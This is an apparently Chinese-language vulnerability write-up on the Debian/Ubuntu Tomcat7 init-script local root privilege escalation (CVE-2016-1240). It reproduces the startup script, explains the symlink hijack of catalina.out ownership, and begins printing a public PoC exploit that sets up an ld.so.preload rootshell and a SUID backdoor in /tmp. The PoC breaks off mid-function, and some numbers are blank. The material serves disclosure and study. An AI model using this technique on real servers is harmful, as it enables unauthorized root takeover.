l+cZUcAPpisJWoolNKlOovrBHKQtNCpxxeYqMDUXGmkRkHj55fSKZsztb6My/T+LLB4c4dtO19S7/WMXqlYZ4ehV5oqDgA+mKwl6iiR0vwpTFsDVwmkmIJJJmuxwARBp1bwJqXU7z9WSGmWzZlcWd5lam2dHOCVXNJCwdu/K1KqzJVqzmvhkeziAOCDyZpSgXHBq9QkbWhcH4c2zOStFMgbYo23TLoK4iGcmgojSqnbxHNRr7TS5myqwgKTtYHJa5hcwdtaqslSal/B61bY/ew3TdYKXgCIYF8pAIxgsgZQAFIK8PRgsgZQB1IKAJisAVSBlAIAAFSBlAIAAFSBlALcNoV7UZwMD/vNIg0DgB6kNEbdTrJMrHVyr1UE8raTjHfFORzs3TRthsFkzUrNts42Y5FVSslhBFAIUqqxjsjdiZSKWQrcfBzjhmJrioZBhTBZWxCjlO6wTgOoApO15KXash09qMla6k5EeWgvpx0ma3KICpO12BBNM1kTcyzIUhoZt/WtLPx8AAAma6kqbFL6qCZrfujgORtJaZf5T8/z7oHJWoDZEE02WRNd0tqqQikVjNuG60BJAQrBZC1RgVFKlS8Td2qylmZQI8l5DZM1vZNqkVKLIVpmOvtISuUzd1inAVSByZpGxgBvfEOGFsTP0bsxWVPwZLu/86eSXikmaw4FhmiTJmtNLKWicZtzKXRJAYrAZC1RQ6GULtUrXSfQFCnnNUzW/D8rTdY6anql7Xhv2CslLyDAzGCylqijRErzpzBtDVwtUIS3oHPs6kvOa5isqW2dHOA1GqJlmKy1hcOcuoJxGwDUgsmaUoFxwavUJG1oXB+HNszkrRZIwL0fwWIgPfzUvlJpjBSTtUlDtK1isqas4O1Pcw9Gxm0AUAv7SgEeClzSANYHKQW4f3BJA7gqSCnAI4BLGsAVQUoBAACqQEoBAACqQEoBbpSszV/GfasAsARIaYy6nWSZWOs8/TIDeRs7nf0kftKH7/gBbt4Mg8maJXZWGXPKv9U+dQDPAlKqsc7j5jal1DMF24lGY5isZaRoKDRZQ0oB7oVlTNaMxYseLeXFC4LZsh09mMlayhTMyZbr51jITxyIyVrYtvDixzI73xtHGdAV/vFFZ2ofhvhj4911lBcgyWIma6bimVQWzw5mk9IHM1nbpUzB0kZj4kERTNbiRrtDxWc3UJi8UHy7gxfSZ0qNjD42fpqxGYcNAB6QBU3WDMUzWfVftF1KV/E+WynQcJp0vitFmKzNarIWyuVQ+HwOXoi+ZYyvJtMuu2eGjbF8luiXAiRYzGTNVjx15uzF88gY4I1vSPv7/ZmsJUzBooe9O3aIyZoc3W6yJo3atl9RLpfvIIA/RDu+KEipOpobj6DbP0sAELKcyZqteBaVxZcIlhgqu0OTNdUUTOw0xY3DZC3qJsr3M0kkZqE/Q7qvLzclvCRTrxQpBTCylMmatXgW9yCl+VOYt2myFgwwxLcCkzXpStS2Tg7wnp3R10jMPDH1Qrpu3dF7rJ2ZmC3w5kqRUgAjy5isZRTPYS0pxWQtfIwro4RCV2s8ismay+Q1OO2UxmG9L6rCuX4ThHZGIqu8m+KEKlIKkIZ9pQAAAFUgpQAAAFUgpQAAAFUgpQAAAFUgpQAAAFUgpQB3xMvH4e3nbf9+7XYAgAtSGjNDqqScWOvsMsgMFCQGivZ+xMkHzkf5oFq9l4NwuYSQ6saRquLCZpjkx6Y40VJIWkrdXaYAsB5IqcY6InebUhqYgk0lXtASOiZTNAwqNLe+C5QlAAAWEklEQVTJWtgKd+dk7r1Wiq9ksiahSGnX0FZKvbwUALACy5is7UZTCS9TS1Bc+/e+UPE8MrIdPbjJ2lQ6QFFe05v6j3aTNb+iqlwBJWkDpeLmxIFOucmP0+bz7e2n/TlsX9WDrZQevg7tcUdTx5tHzxRgbRYzWet/iyw+bI/CJYrnYZbSRzdZC0rqb/nUQYdjhsmaeyFVYliZskfM8x61KbrP0f0Ued+//bwdPl6apmmal+3n9kU52Erp2+emed0eft7evrYvTkNQUoDrsKDJWtc9Kk0EO3/xPOxSqirLzOns1wg0nOYlDrzo1mlFSjrWaTFZG3+vUdLi4YmoePKGaJ1Ui5S6uqgddAZ4N/vx1e6OH8/tlDUDvADrspjJWtMITy9tUk0esZ27eB4ZA7zxDRlaED9Hk0/eaweSTMGSnbCCwV3nDGfwYEjjPBCN8eZ8kwoomSdVi2f0SqX7KfOy/RrGcodhW+GgIqVDPLqkANdgOZO13enyfT75T7+MtS8LFM+jXEqX6pUuH0g2BdOnBsu6pM20M4z0PeBY+m7OqqNjc922KV825fuZJBq2DQ6mpRQArsNSJmvDY9F7sOYPZ85ZPI9CKc2fwsx1alk4kBBPW7BarKSTUhruHem6qwVv5ew62jVPvCGN/rGZHODte6KOQEoHkVKAW2QZkzVvbHWYVDJr4ULFzWCyFsYbR17rB3eFsyZM1pqyt7Fp4n5h1SdhUZO1rBW8SCnAbcG+UrgHKoYXAACWBimFOwAlBYBbBimFG8fNjAQAcIsgpQAAAFUgpQAAAFUgpXDTZOwlfj68zIIAcD2Q0hh1O8kysdZRivJAmnWak5poqNl867y8Rqnza29QECi7Lqd8kDFT3R8jxZjNZM3DJqWkQAJYHKRUYx2RuwMplatxjbzC9bWGWBWpKfKoK7+7OZM1jwkp3eG8BrASmKwlL9WW7ejBTNYSKAkYUsnz1MsR2zH29twMwN11l2jBjN9V1jZZ07IxdOYwvdVaJ6VtckGc1wCuAiZriSpsUvpgJmsTbZCeyOHXlWIpFS7E+V5U9GZ6A7xVcrK6yZospU4+3lZ9Dx8v7gmbTy9fEs5rAGuAyVqiAqOUruB9tmIgexMGlQrfE6OUhh1lv/6uEv2K8qnxCrqCyZospa7oDr+LB/t7h/MawOJgsqaRMcAb35ChBfFz9KZN1lLoD2Mh+XxJrzRcivTd5bhXrqjwGko+Eu48aVavtMpkTZRS5+ComuJBp4F0SQEWBpO1RA2FUnq/Jmvp+Il7mR1LkVL5m9JcvdKyGnwdjWpJzZXWmaxV90oBYC0wWUvUUSKl+VOYt2myFof3invrQUOxmWOutO9MVc6Veu0sGKeIdTRoybIma50ouiammXOlALAGmKwpFRjXqkhN0obG9XFow8KQ1QKJCComr+ex3jpN2Z1anfe8YgWv16LsK7+yyVo/6vt1OBSu4AUAAAAAuH3+8+WX//nyy2u3AgAA4G75r5df/o8/IaUAAACl/O0v//Bff/rFtVsBAABwt/yvv/63/2TZPAAAQDH/48+//C8GeAEAAIr5739s/vbXf7x2K24LdTvJMrHWyedmDCRde5CFyN3C6h/S7NhivD3Ic+ReUBvfyBtX8ussNFmL79K62LeZameSLAlgmv/44y82//FP127FLbKOyN2alEoni0XdzbtamiI9YCu6bkbA+R7XcV4/LZ2CqS436YhQUTpFQ8qKbh0qpHSHRxuAlf/177/+rz//g/l0d8M8JmtKk4yZE27YZG1aSiO9EhJCJG7f8fx9OZ8HafESHwZX5FdkEF0tC65yJXZKTdZs0YUUDVE6wDb3gpTMQS3u/uzfmyDZ79vnRj+zwaMNwMrf/vqP//3FvoJ3h8laHCge0cvK52fPhbhKoPhkKa9R3PVTbWsk2sYNTeyKy41367Z0X72mTbQzh0KTNfc8PbhkshZlsT9sX5Uz5eJNk+6VOvKsnYlHG4CJ//rzL/7nX7J6peGU0eW0w2RNPnC3JmsGPQgGeDPfqO7z4nx8WhMYsfHj7yYl9BqfNETLodBkzfkikmy5ZLLWdPK237RdSScxb3imUrwxSOmQ+F4a4P0+49EGYOE///SLv/27KKXa6GH0oLhgsqYcuFuTtdTJ8WDs9+V08jRu+rkb9EcHKZUb34e09SkX6JW686RVvVL9tggma00zdBw3e7fTKZypFJek1BkKfktK6dBuuqQAU/ztr//wt3//lfn0+EGByVrcCVmoV7pOoKmTJTUK1Wvyro9KeTwPSqw33hXczMbXz5X6OjpVZ+6tC3FNYJqmH+M9HGKRC8+UD4YCqduxYSkDUM7/+Ldf/c+/1kjpDpO1+IZkTWHaGrhaoCiY4lN2PLnLmjxpmQ4UtLj74KiNb47n7/PZ2KOMO439nwWjlLGOTtSp3zq5qg7RZK1pmtEHZr9JnKkXT0ip49EmnQkAdv79X5vMZUfh08CTrbGrEcyZDp0my7MMk7XrBZKuXfYpcwd4ReVKR/HGb513ONF4i0ILb9zY0OxvVdUma+N5U+HFdblN03c0PzfpMyeKSyt4PY824UwAMPPXPzR//VdZSv+///2/+eGHH35qflZ+oAFchz//7hd//p380tX/EfLDDz/3/rPu8wzgSvzxN83Lb+mV8sMPP4v8rPxAA7gOf/zNL/7yx1+LL/GPAQDK4OkBz8Uf/vkXf/iN7AzDPwYAKIOnBzwXf/ztr373zxMDvCs3CQDuHZ4e8Fz89eXXf/wdvVIPdUfGMrHWSchmCqS5pDlbOpztTso+kf7liXDuNpGZboH2xhmTsjstErb8TLZRLJ61FWe1nZ1BoH7rqpACqSnNdvS0Tw94Uv7yx3/849Syo5WbdCOsI3K3JaVyiWw/teNZ8AzyibIazpecLk4/5KTGP6mN2sl+amKd9uJZCSKuJaUurazu35vhkspM1p786QFPx59+1/zxt/JL0j+GHSZrwlkPZ7LWlYrz+jbSMzXQiOP5+3ycuHuqrER5H9zrLkmxWJZ1V3C6yVESkx2bh2ZzJiVYaFMrvP0cDl+OUVqb50hPzDvlp+YUGZMllZusIaXwXPzpd82ffi+/pEgpJmthoChzXF4+P3suxFUChZULifiUt7z/s8sBmAqnvJPChTjfi4xvZpgQ2PkGYhWEKJKS5Uupz2bHFhN1FscsgP1LrToetu/bw8/b/r39c7/pdLRLLrj5iCxiDH5qw2n+6G6ZkiKl8GT85V9/8eff2wd4wwSr/bMCkzXpwN2arPnRMvzUhiiGcE5neexkR1XpV5Rou5iUcCILrt+wIE6OlFrt2GIMqec3nZS+bvajlB62H6EEhpgy1w/CPF7hudRkDSmF5+LfX371b38Qlx3thn8Mqb7NDpM1vf9ytyZrQo72QfRSfmqj1uWE6xXOy1fb94X0K0pUF/RK7f1CTW6zvvEURxdXA3VdyaSU7j8P0VDtUKHZTy1K9tu3mmVHAFP89Y+/esmdKw0nRzFZCwMv0ytdJ9BE5z8UqkBXA4whY79SsTEFvdJganeiBrXbah+i8E/Ls3ibuVea6ac276InpBSei7/8/pd/+Cf5JZuU7jBZi29I1hRmkXXYcoGEMwv81KbnSv1q2pMDw5gZ5ko9NUsP8KZeNQzwysXrVvDqc6WBlL5Kc6VZfmpKl7QYpBSei7/84Vcv/yK/ZJNSX7a6FzFZi/pkyXFow8qO1QJJT3x3gHeXPDPV3CiOcIudQV7nPbeu4JXfOOdo4tK1dc7ahyH4YGXZsWnENmeyRVospU16Be+kn5o3mDwHSCk8F//xx//2l4xlRwDrkrdcCm4Fnh7wXPzb73/5598hpXCrIKX3CU8PeC4sJmsrNwlgBCm9T3h6wHPxr//yy9//E36l/PDDzyI/Kz/QAK7D7//5V7/9NVLKDz/8LPKz8gMN4Dr89p9+9ZtfTzjD8MMPP/yU/az8QAO4Dv/y61/85v/41bVbcVuo20mWibXOVKA9UJzCXLghdju2yVDzXX/yjTP4viXrnLROWyL6SJQd105ZuiIAyOCf/7H57T8hpQLriNytSamXaMC3JNNrGF5xUwsZckIcz9+XS0VCKhmxnQbfN6UuKb9DIvHCnNFdSqR0V+OSBgAZ/PM/Nr9R5kol3A3zmKwpTTJmTrhFk7VUYj31hiipGiZvYHtCkLdXysZgfN/1uBbft2lM1mll0Z0MCWOGo8Yx5fZyLMSZHFzjF090y13SACCD3/z6F5lSislaGChO/Z6Vz8+eC3HxQL5mBU9fpQat9zn5HaYr6H9kxMbb33exnTuT79skNuu0suiylLaSOSYObAVyPOHl4+ClOvrcNN7BrnUoKcDi/PbXv/zNP8rLjiTC52b/gMBkTTpwdyZrSUsyuQbhE2F7dnsJJ6OEyWHHL0MKtG5inZRardPKostSKuajV5LUbz7bUq53967GJQ0AZkEbPYy+c18wWVMO3J3JWl5/Kw4SvJJ6eDvy2P+qNj5PBP2zy3zfhMaqzUndJWt0UUolk7WXYcg3sE7rO6ObfTSlyrIjgFsjfiBgshYp3FK90hUCpSzJhBrS3cWJiVdv/vZySrh8V0hpse+b31S/kHmu1Bw9t1cq5J1/3R5+3vYf28OsWekBYAnih9oOk7X4hmRNYdoauFKghCVZqgV94WCCU7+BkWX4xVusVmFbrp5d1CuVryJ3Be909EEpnfnRybnStmDkA7OfzSkNAJYh1TNxnjqYrElD4/o4tGFycbVAkiWZal4mfRgsNy4sejx/X07H5Apeiwgm37gSKc2yTquK3gvh1+GQs4LXdRht5XZGz1EAALg36tYFAQAAPD1IKQAAQBVIKQAAAAAAAAAAAABACcN2mkILGgCAEXU7yTKx1pkfNAZydrO4hgDClhDhTPut8/Yge3/UIEd3Glpwq8XLFDfDJK+92mRtVjafb26e3o4c8xkyKAGAiXVE7rakdCd7ignVJM+cjtXKc5+OYV6ntTB1n5fxLzOOcplXMFmblQop3WHcBlDPDpM14azHMVlzkfL+ySl3BX+gaSm9nM+X/nF86ioYWxrLU43Jmr1hE40ecjHZEgc65fJz8L5sv7rMDG8/h8OXk34hMllLpPDta/By+bo/Y6kor2+X8+En0F2M2wBq2WGyFgeKxxOz8vnZcyGuEqhHyWUkPD2jM21SejqeLufj8XxxPUvFSPb3PR29zuBgbZO1dubysH1v0+q2f+43jlgOncuElL59brxkhE3TGHul3p8v28+xOMZtAJWED9P+AYHJmnTg7kzWRiTVkW+/cKZRSne70+VyOZ92Qgc4+gplf2xLYlb/6F/fZK2X0tfNfpTSw/ZDyHE/ZSzjp+3NkVK3VH9B32eM2wDMaKOHUgcEkzXxwN2ZrI3nCs9I6cEpn2mVUnfwIFzK5L6feV8D0r3Some/f5kZvdIakzVZSvefqvPazFLqLOiNvWhYdgRQQ/xAwGQt7gIt1CtdLZCy3kjofMrKZJZS58/zMWz8/FKa9n1L1Bdc5joma9fulQ5E48MAUEn8mNphshbfkNm9z9YKlFLHeHy5fHXPlJT6/ccKKc3wfdMqS3fQlzNZU6T0VZgrFT3a6gd4+55oWBwAKhEeCJ5sdS9ismZYWBsGM6zgXTqQutY3GtzVzjTeOlFK3Saei3qlUnRv0Dj3a9U1TdY0KRVW8IoebQkplWoQeqXKCl4AAAAAAAAAAAAAAAAAAAAAAAAAAABYjjmd15xFxQDw6KjbSZaJtU7uNWMgZ+tIkANX2OIh5TWXdonEYLJ2VeR9pSI5zmuTpKWUDEoAD8g6IndbUrqTPMXEg0HyguNp2FCs5S7wwGTtqtyYlO4wboNnY4fJmnDW85isKUZjYpGJBH6YrDlc12RNPjPPeU0gPlMJ1GDcBs/GDpO1OFA8npiVz8+eC3GVQD3irfPz5p+C518QI5HwFpM1n+uarCXOtDuvhUhnJgJh3AZPRThE1j8gMFmTDjyYyVpgNOYnXL6cdmn3sbCmCyZrI9dNZ59KMWhyXpOQzlQC7TBugwdGGz2MHlMXTNaUAw9lsuYfFHtmmb1STNYGrmuyliGlSee14JriM1OBWHYEz0T8QMBkLe4CLdQrXS3QlI62tQtykjVXKimx2/j5pRSTtY4KKe2xO6/ZzGoAnor4MbXDZC2+IVlTmLYGrhPIqKNd/fHi1owVvEkpxWRtTZO1rAFezXktXJ0rnYmUArQIDwRPtroXMVkzLKwNgxlW8C4dSFzrm3Jei+/ROEabuh5M1kKuabKW1SvVVvDGG120FbxIKQAAAAAAAAAAAAAAAAAAAAAAAAAAAADAzKjbSZaJtU6eNGMg+drdDSXDrtWAMF1Rct8JJmtXJcMZprpOchgBPDXriNytSal0spvdQcz00J++ky3JBDBZuyqrSOkO6zQAjR0ma8JZD2eypiWSlW+LnNcomaMPkzWf65qsDceHk7vkCUIuCOmgVifWaQAKO0zW4kDxeGJWPj97LsRVAsUnp3ulSlcvfecxWfO5rsla0wxyuN+0J3xsX6RAjXxQqRPrNACF8LnZPyAwWZMO3K3JWnxy/0wUkxfG78mUaGGy5nPddPZuVfKR4XfxoFznDus0gEYfPYweUxdM1pQD92qyFg/wCpnrpSDyOQKYrPlc12TNrUpqkhhoUkqHW0CXFCBE7K5gshYGXqZXuk6g6OSEcgjdRYOONpishTxirxQAVOLH1A6TtfiGZE1h2hq4WqAomC8lYRc1GnQ2vUOYrAVc1WTNa8DIDHOlACAiPBA82epexGTNsLA2DGZYwbtCIPHa3YOeqka9tW+htBxF6ulisnYVk7WmUSy+jSt408cBAAAAAAAAAAAAAAAAAAAAAAAAAACeEHGBLgDAcqjbSZaJtU5GNWsgZ+/IcL5904311mGytjIVUkq6IgAoZx2RuzEpTVmSaWkbjQeDOKMKYbK2AiVSusMlDWAhdpisCWc9nMmaeAdmllJM1hzUdAqC91mfjeFntF2T/dQGc5j+pU5Kw1wKupsbLmkAy7DDZC0OFI8nLuB9tlqggfBLyNxSisnaSFpKfe8zh/d9W0r2U3N+33y+9VIaZ/6T3dzGW4aSAsyNNuiHyZp04C5N1oZebXinZ5dSTNYGJnql2sBsMp29OR/9RsxQONx2XNIAatBGD6PH1AWTNeXA3Zqs9eWn+7VVUuoOHmCyZpbStos5/BicYdIuaZqUDtdAlxRgZuIHAiZrcRfo7k3WGnMNdVLqBwoaP7+U3pfJWtM0Vu+zZXqlALAU8WNqh8lafEPu1WQtaUm2ppRismaR0mEGVJbS3LlSpBRgLYQHgidb3YuYrBkW1obBbsJkzRtiHU6cdF5LH4zBZC1EcElrGnGAd1zBO6zL1Tq19hW8SCkAAAAAAAAAAAAAAAAAAADAM/Mj/QAAwBNQsWdlLuZK51Kyf3M+kFIAgEeiXFO87Qvjtg7nsJ84wD+tEFdKa+pMZ2SapakJkFIAgEdiSlNsvdBhs+pOtLuqs9ByGaW02pYrrZMFeQL8mlN2V0gpAMDq/P9zWfur3YaeiQAAAABJRU5ErkJggg==" alt="" />

启动脚本的内容为

#!/bin/sh

#

# /etc/init.d/tomcat7 -- startup script for the Tomcat  servlet engine

#

# Written by Miquel van Smoorenburg <miquels@cistron.nl>.

# Modified for Debian GNU/Linux    by Ian Murdock <imurdock@gnu.ai.mit.edu>.

# Modified for Tomcat by Stefan Gybas <sgybas@debian.org>.

# Modified for Tomcat6 by Thierry Carrez <thierry.carrez@ubuntu.com>.

# Modified for Tomcat7 by Ernesto Hernandez-Novich <emhn@itverx.com.ve>.

# Additional improvements by Jason Brittain <jason.brittain@mulesoft.com>.

#

### BEGIN INIT INFO

# Provides:          tomcat7

# Required-Start:    $local_fs $remote_fs $network

# Required-Stop:     $local_fs $remote_fs $network

# Should-Start:      $named

# Should-Stop:       $named

# Default-Start:

# Default-Stop:

# Short-Description: Start Tomcat.

# Description:       Start the Tomcat servlet engine.

### END INIT INFO

set -e

PATH=/bin:/usr/bin:/sbin:/usr/sbin

NAME=tomcat7

DESC="Tomcat servlet engine"

DEFAULT=/etc/default/$NAME

JVM_TMP=/tmp/tomcat7-$NAME-tmp

if [ `id -u` -ne  ]; then

    echo "You need root privileges to run this script"

    exit

fi

# Make sure tomcat is started with system locale

if [ -r /etc/default/locale ]; then

    . /etc/default/locale

    export LANG

fi

. /lib/lsb/init-functions

if [ -r /etc/default/rcS ]; then

    . /etc/default/rcS

fi

# The following variables can be overwritten in $DEFAULT

# Run Tomcat  as this user ID and group ID

TOMCAT7_USER=tomcat7

TOMCAT7_GROUP=tomcat7

# this is a work-around until there is a suitable runtime replacement

# for dpkg-architecture for arch:all packages

# this function sets the variable OPENJDKS

find_openjdks()

{

        for jvmdir in /usr/lib/jvm/java--openjdk-*

        do

                if [ -d "${jvmdir}" -a "${jvmdir}" != "/usr/lib/jvm/java-7-openjdk-common" ]

                then

                        OPENJDKS=$jvmdir

                fi

        done

        for jvmdir in /usr/lib/jvm/java--openjdk-*

        do

                if [ -d "${jvmdir}" -a "${jvmdir}" != "/usr/lib/jvm/java-6-openjdk-common" ]

                then

                        OPENJDKS="${OPENJDKS} ${jvmdir}"

                fi

        done

}

OPENJDKS=""

find_openjdks

# The first existing directory is used for JAVA_HOME (if JAVA_HOME is not

# defined in $DEFAULT)

JDK_DIRS="/usr/lib/jvm/default-java ${OPENJDKS} /usr/lib/jvm/java-6-openjdk /usr/lib/jvm/java-6-sun /usr/lib/jvm/java-7-oracle"

# Look for the right JVM to use

for jdir in $JDK_DIRS; do

    if [ -r "$jdir/bin/java" -a -z "${JAVA_HOME}" ]; then

    JAVA_HOME="$jdir"

    fi

done

export JAVA_HOME

# Directory where the Tomcat  binary distribution resides

CATALINA_HOME=/usr/share/$NAME

# Directory for per-instance configuration files and webapps

CATALINA_BASE=/var/lib/$NAME

# Use the Java security manager? (yes/no)

TOMCAT7_SECURITY=no

# Default Java options

# Set java.awt.headless=true if JAVA_OPTS is not set so the

# Xalan XSL transformer can work without X11 display on JDK 1.4+

# It also looks like the default heap size of 64M is not enough for most cases

# so the maximum heap size is set to 128M

if [ -z "$JAVA_OPTS" ]; then

    JAVA_OPTS="-Djava.awt.headless=true -Xmx128M"

fi

# End of variables that can be overwritten in $DEFAULT

# overwrite settings from default file

if [ -f "$DEFAULT" ]; then

    . "$DEFAULT"

fi

if [ ! -f "$CATALINA_HOME/bin/bootstrap.jar" ]; then

    log_failure_msg "$NAME is not installed"

    exit

fi

POLICY_CACHE="$CATALINA_BASE/work/catalina.policy"

if [ -z "$CATALINA_TMPDIR" ]; then

    CATALINA_TMPDIR="$JVM_TMP"

fi

# Set the JSP compiler if set in the tomcat7.default file

if [ -n "$JSP_COMPILER" ]; then

    JAVA_OPTS="$JAVA_OPTS -Dbuild.compiler=\"$JSP_COMPILER\""

fi

SECURITY=""

if [ "$TOMCAT7_SECURITY" = "yes" ]; then

    SECURITY="-security"

fi

# Define other required variables

CATALINA_PID="/var/run/$NAME.pid"

CATALINA_SH="$CATALINA_HOME/bin/catalina.sh"

# Look for Java Secure Sockets Extension (JSSE) JARs

if [ -z "${JSSE_HOME}" -a -r "${JAVA_HOME}/jre/lib/jsse.jar" ]; then

    JSSE_HOME="${JAVA_HOME}/jre/"

fi

catalina_sh() {

    # Escape any double quotes in the value of JAVA_OPTS

    JAVA_OPTS="$(echo $JAVA_OPTS | sed 's/\"/\\\"/g')"

    AUTHBIND_COMMAND=""

    if [ "$AUTHBIND" = "yes" -a "$1" = "start" ]; then

        AUTHBIND_COMMAND="/usr/bin/authbind --deep /bin/bash -c "

    fi

    # Define the command to run Tomcat's catalina.sh as a daemon

    # set -a tells sh to export assigned variables to spawned shells.

    TOMCAT_SH="set -a; JAVA_HOME=\"$JAVA_HOME\"; source \"$DEFAULT\"; \

        CATALINA_HOME=\"$CATALINA_HOME\"; \

        CATALINA_BASE=\"$CATALINA_BASE\"; \

        JAVA_OPTS=\"$JAVA_OPTS\"; \

        CATALINA_PID=\"$CATALINA_PID\"; \

        CATALINA_TMPDIR=\"$CATALINA_TMPDIR\"; \

        LANG=\"$LANG\"; JSSE_HOME=\"$JSSE_HOME\"; \

        cd \"$CATALINA_BASE\"; \

        \"$CATALINA_SH\" $@"

    if [ "$AUTHBIND" = "yes" -a "$1" = "start" ]; then

        TOMCAT_SH="'$TOMCAT_SH'"

    fi

    # Run the catalina.sh script as a daemon

    set +e

    if [ ! -f "$CATALINA_BASE"/logs/catalina.out ]; then

        install -o $TOMCAT7_USER -g adm -m  /dev/null "$CATALINA_BASE"/logs/catalina.out

    fi

    install -o $TOMCAT7_USER -g adm -m  /dev/null "$CATALINA_PID"

    start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" \

        -c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" \

        -x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"

    status="$?"

    set +a -e

    return $status

}

case "$1" in

  start)

    if [ -z "$JAVA_HOME" ]; then

        log_failure_msg "no JDK or JRE found - please set JAVA_HOME"

        exit

    fi

    if [ ! -d "$CATALINA_BASE/conf" ]; then

        log_failure_msg "invalid CATALINA_BASE: $CATALINA_BASE"

        exit

    fi

    log_daemon_msg "Starting $DESC" "$NAME"

    if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \

        --user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \

        >/dev/null; then

        # Regenerate POLICY_CACHE file

        umask

        echo "// AUTO-GENERATED FILE from /etc/tomcat7/policy.d/" \

            > "$POLICY_CACHE"

        echo ""  >> "$POLICY_CACHE"

        cat $CATALINA_BASE/conf/policy.d/*.policy \

            >> "$POLICY_CACHE"

        # Remove / recreate JVM_TMP directory

        rm -rf "$JVM_TMP"

        mkdir -p "$JVM_TMP" || {

            log_failure_msg "could not create JVM temporary directory"

            exit 1

        }

        chown $TOMCAT7_USER "$JVM_TMP"

        catalina_sh start $SECURITY

        sleep 5

            if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \

            --user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \

            >/dev/null; then

            if [ -f "$CATALINA_PID" ]; then

                rm -f "$CATALINA_PID"

            fi

            log_end_msg 1

        else

            log_end_msg 0

        fi

    else

            log_progress_msg "(already running)"

        log_end_msg 0

    fi

    ;;

  stop)

    log_daemon_msg "Stopping $DESC" "$NAME"

    set +e

    if [ -f "$CATALINA_PID" ]; then

        start-stop-daemon --stop --pidfile "$CATALINA_PID" \

            --user "$TOMCAT7_USER" \

            --retry=TERM/20/KILL/5 >/dev/null

        if [ $? -eq 1 ]; then

            log_progress_msg "$DESC is not running but pid file exists, cleaning up"

        elif [ $? -eq 3 ]; then

            PID="`cat $CATALINA_PID`"

            log_failure_msg "Failed to stop $NAME (pid $PID)"

            exit 1

        fi

        rm -f "$CATALINA_PID"

        rm -rf "$JVM_TMP"

    else

        log_progress_msg "(not running)"

    fi

    log_end_msg 0

    set -e

    ;;

   status)

    set +e

    start-stop-daemon --test --start --pidfile "$CATALINA_PID" \

        --user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \

        >/dev/null 2>&1

    if [ "$?" = "0" ]; then

        if [ -f "$CATALINA_PID" ]; then

            log_success_msg "$DESC is not running, but pid file exists."

            exit 1

        else

            log_success_msg "$DESC is not running."

            exit 3

        fi

    else

        log_success_msg "$DESC is running with pid `cat $CATALINA_PID`"

    fi

    set -e

        ;;

  restart|force-reload)

    if [ -f "$CATALINA_PID" ]; then

        $0 stop

        sleep 1

    fi

    $0 start

    ;;

  try-restart)

        if start-stop-daemon --test --start --pidfile "$CATALINA_PID" \

        --user $TOMCAT7_USER --exec "$JAVA_HOME/bin/java" \

        >/dev/null; then

        $0 start

    fi

        ;;

  *)

    log_success_msg "Usage: $0 {start|stop|restart|try-restart|force-reload|status}"

    exit 1

    ;;

esac

exit 0

我们跟进重点部分

# Run the catalina.sh script as a daemon

set +e

touch "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

chown $TOMCAT7_USER "$CATALINA_PID" "$CATALINA_BASE"/logs/catalina.out

start-stop-daemon --start -b -u "$TOMCAT7_USER" -g "$TOMCAT7_GROUP" -c "$TOMCAT7_USER" -d "$CATALINA_TMPDIR" -p "$CATALINA_PID" -x /bin/bash -- -c "$AUTHBIND_COMMAND $TOMCAT_SH"

status="$?"

set +a -e 

Tomcat服务在启动时(启动脚本代码所示)，会将log文件catalina.out的所有者改为Tomcat用户，而启动脚本由linux init(root用户)调用，利用这个特性，我们可以通过创建软链接的方式，将任意文件的属主改为Tomcat账户，达到降ACL的目的。如果将catalina.out修改为指向任意文件的链接将会导致攻击者以高权限随意操作任意系统文件，这是一种典型的配置文件加载劫持的漏洞利用方式

4. 漏洞PoC

Usage: ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred] 

The exploit can used in two ways:

-active (assumed by default) - which waits for a Tomcat restart in a loop and instantly gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.

It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

-deferred (requires the -deferred switch on argv[]) - this mode symlinks the logfile to /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.

Attackers can come back at a later time and check on the /etc/default/locale file. Upon a Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can then add arbitrary commands to the file which will be executed with root privileges by the /etc/cron.daily/tomcatN logrotation cronjob (run daily around :25am on default Ubuntu/Debian Tomcat installations).

tomcat-rootprivesc-deb.sh

#!/bin/bash

#

# Tomcat // on Debian-based distros - Local Root Privilege Escalation Exploit

#

# CVE--

#

# Discovered and coded by:

#

# Dawid Golunski

# http://legalhackers.com

#

# This exploit targets Tomcat (versions ,  and ) packaging on

# Debian-based distros including Debian, Ubuntu etc.

# It allows attackers with a tomcat shell (e.g. obtained remotely through a

# vulnerable java webapp, or locally via weak permissions on webapps in the

# Tomcat webroot directories etc.) to escalate their privileges to root.

#

# Usage:

# ./tomcat-rootprivesc-deb.sh path_to_catalina.out [-deferred]

#

# The exploit can used in two ways:

#

# -active (assumed by default) - which waits for a Tomcat restart in a loop and instantly

# gains/executes a rootshell via ld.so.preload as soon as Tomcat service is restarted.

# It also gives attacker a chance to execute: kill [tomcat-pid] command to force/speed up

# a Tomcat restart (done manually by an admin, or potentially by some tomcat service watchdog etc.)

#

# -deferred (requires the -deferred switch on argv[]) - this mode symlinks the logfile to

# /etc/default/locale and exits. It removes the need for the exploit to run in a loop waiting.

# Attackers can come back at a later time and check on the /etc/default/locale file. Upon a

# Tomcat restart / server reboot, the file should be owned by tomcat user. The attackers can

# then add arbitrary commands to the file which will be executed with root privileges by

# the /etc/cron.daily/tomcatN logrotation cronjob (run daily around :25am on default

# Ubuntu/Debian Tomcat installations).

#

# See full advisory for details at:

# http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html

#

# Disclaimer:

# For testing purposes only. Do no harm.

#

BACKDOORSH="/bin/bash"

BACKDOORPATH="/tmp/tomcatrootsh"

PRIVESCLIB="/tmp/privesclib.so"

PRIVESCSRC="/tmp/privesclib.c"

SUIDBIN="/usr/bin/sudo"

function cleanexit {

    # Cleanup

